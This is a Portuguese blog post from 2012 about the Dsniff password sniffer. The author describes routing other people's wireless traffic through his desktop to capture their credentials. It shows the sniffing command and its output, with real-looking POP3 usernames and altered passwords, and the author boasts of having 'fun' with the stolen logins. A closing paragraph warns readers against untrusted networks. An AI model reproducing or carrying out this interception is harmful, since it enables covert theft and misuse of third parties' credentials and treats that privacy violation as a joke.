segunda-feira, 23 de julho de 2012

Descubra as senhas da rede com Dsniff

Venho aqui falar de um programa um pouco polêmico, o Dsniff. Ele é um sniffer de rede voltado para descobrir senhas.

Para mostrar como ele funciona, vou contar o que fiz uma vêz para sacanear os espertinhos que ficavam tentando acessar a minha rede sem fio. Geralmente, as pessoas colocam a roteador sem fio entre o micro e o link de Internet. Assim, toda a casa, ou empresa, pode acessar a Internet. Em casa eu fiz uma pequena modificação. Coloquei duas placas de rede no meu desktop, e coloquei-o entre o roteador e a Internet. Ou seja: Internet -->> Desktop -->> Roteador wireless. Dessa forma, quem se conectasse ao meu roteador para acessar a Internet, passaria pelo meu desktop. E no meu desktop eu instalei o Dsniff. Algumas horas depois eu tinha várias combinações de sites/usuários/senha. Abaixo, um exemplo da saída do sniffer (as senhas foram mudadas por questões óbvias). 

ricardo@desktop:~$ dsniff -i eth0
-----------------
07/23/12 10:08:12 tcp funda-def2dd7a4.xxxx.inet.36972 -> mail.xxxxxx.110 (pop3)
USER ricardoolonca
PASS fa0ed3b2b

-----------------
07/23/12 11:03:08 tcp mail-lb0-f151.google.com.55747 -> xxxxxxxx (pop3)
USER sanpa
PASS 57de89511

-----------------
07/23/12 11:03:36 tcp mail-vb0-f20.google.com.42230 -> xxxxxxxx (pop3)
USER renatareno
PASS c11143764

-----------------
07/23/12 11:04:00 tcp mail-ob0-f164.google.com.43490 -> xxxxxxxx (pop3)
USER lygiajesus
PASS a9caf8b8b

ricardo@desktop:~$

Com as senhas em mão deu para me divertir um pouco! 

Deixando a ética de lado, pense melhor antes de usar uma rede sem fio aberta, ou qualquer outra rede que você não confia, como as de lan house, escolas, lanchonetes, etc. Alguém pode estar usando um aplicativo semelhante a esse. Sempre use protocolos seguros.

Para instalar o aplicativo, que contém ainda outras ferramentas interessantes, basta digitar o famoso apt-get install dsniff.